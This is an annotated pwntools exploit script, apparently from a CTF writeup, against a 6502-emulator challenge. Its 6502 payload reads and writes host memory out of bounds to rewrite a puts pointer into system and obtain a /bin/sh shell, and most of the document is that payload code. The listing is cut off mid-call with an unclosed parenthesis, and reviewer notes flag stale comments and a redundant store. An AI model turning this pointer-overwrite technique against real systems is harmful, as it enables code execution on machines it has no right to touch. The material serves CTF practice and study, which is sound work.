# 01PWN1.6502越界读写,把 puts 改 system然后最好输入一下 /bin/sh 就可以了:
# (Translation of the writeup header: "01 PWN 1. 6502: out-of-bounds
#  read/write; change puts into system, then it is best to send /bin/sh and
#  you are done.")
#
# pwntools exploit for a 6502-emulator challenge.  The payload is a short
# 6502 program.  Every LDA/STA below uses an absolute address ($df42.. and
# $def2..); the writeup relies on those addresses not being bounds-checked by
# the emulator, so the 6502 code reads and writes host-process memory
# ("越界读写" = out-of-bounds read/write).  It copies a 6-byte value the
# author labels "libc" from $df42..$df47 to $def2..$def7 ("nop_code"), adding
# a constant to its low three bytes on the way -- i.e. it rewrites a host
# pointer from puts to system.  What exactly lives at those two addresses is
# not visible here; confirm against the emulator binary.  The added constant
# is a libc-build-specific distance and must be recomputed for the target's
# libc.
#
# NOTE(review): the listing is cut off in the source after the first
# sendline (last line below); whatever followed (sending the payload itself,
# sending "/bin/sh", p.interactive()) is not shown.
from pwn import *

context.log_level="debug"
#p=process("./6502_proccessor")
p=remote("172.10.0.7",10002)
#gdb.attach(p,"b *$rebase(0x59FA)\nb *$rebase(0x5958)")  # PIE-relative breakpoints inside the emulator; presumably the opcode handlers of interest -- verify
#pause()

# Opcode bytes are decoded below as standard 6502 instructions (absolute
# operands are little-endian).  Verify against the challenge emulator: it may
# not implement the carry flag or undocumented opcodes like a real 6502.
payload: bytes = b""

# --- low byte ---
payload+=b"\xad\x42\xdf"  # LDA $df42  -- read byte 0 of the pointer (author: "get libc")
payload+=b"\x69\xb0"      # ADC #$b0   -- author's comment said "add 0x92"; the operand is 0xb0, the comment looks stale
                          #               NOTE(review): no CLC before this first ADC, so the inherited carry is added too -- confirm it is clear
payload+=b"\x8d\xf2\xde"  # STA $def2  -- write byte 0 of the result (author: "write ac to nop_code")
# --- second byte ---
payload+=b"\xad\x43\xdf"  # LDA $df43
payload+=b"\x69\xed"      # ADC #$ed   -- author's comment said "add 0xec"; operand is 0xed (carry from the previous ADC ripples in)
payload+=b"\x8d\xf3\xde"  # STA $def3
# --- third byte ---
payload+=b"\xad\x44\xdf"  # LDA $df44
payload+=b"\x69\x01"      # ADC #$01   -- author's comment "add 0xec" is a copy-paste leftover; this adds 1 (+carry)
payload+=b"\x8d\xf4\xde"  # STA $def4
# Assuming ripple-carry ADC semantics, the three ADCs above add 0x01edb0
# (plus the initial carry) to the low 24 bits -- presumably system - puts
# for the target libc.
# --- upper three bytes copied unchanged ---
payload+=b"\xad\x45\xdf"  # LDA $df45
payload+=b"\x8d\xf5\xde"  # STA $def5
payload+=b"\xad\x46\xdf"  # LDA $df46
payload+=b"\x8d\xf6\xde"  # STA $def6
payload+=b"\xad\x47\xdf"  # LDA $df47
payload+=b"\x8d\xf7\xde"  # STA $def7
# NOTE(review): the third byte is recomputed and stored a second time.  LDA
# $df44 reloads the *original* byte and the carry has not changed since the
# earlier ADC #$01 (LDA/STA leave it untouched), so this appears to store the
# same value again -- probably a leftover; confirm it is not load-bearing.
payload+=b"\xad\x44\xdf"  # LDA $df44
payload+=b"\x69\x01"      # ADC #$01
payload+=b"\x8d\xf4\xde"  # STA $def4
payload+=b"\xfc"          # author: "nop" -- presumably the emulator's end-of-program byte; on a stock 6502 $FC is an undocumented 3-byte NOP abs,X, so do not assume it is a 1-byte NOP elsewhere

# The service first asks for a length, then (presumably) reads that many
# bytes of 6502 code.
p.recvuntil("length:")
p.sendline(str(len(payload))  # NOTE(review): source is truncated here -- closing paren and the rest of the interaction are missing
………………………………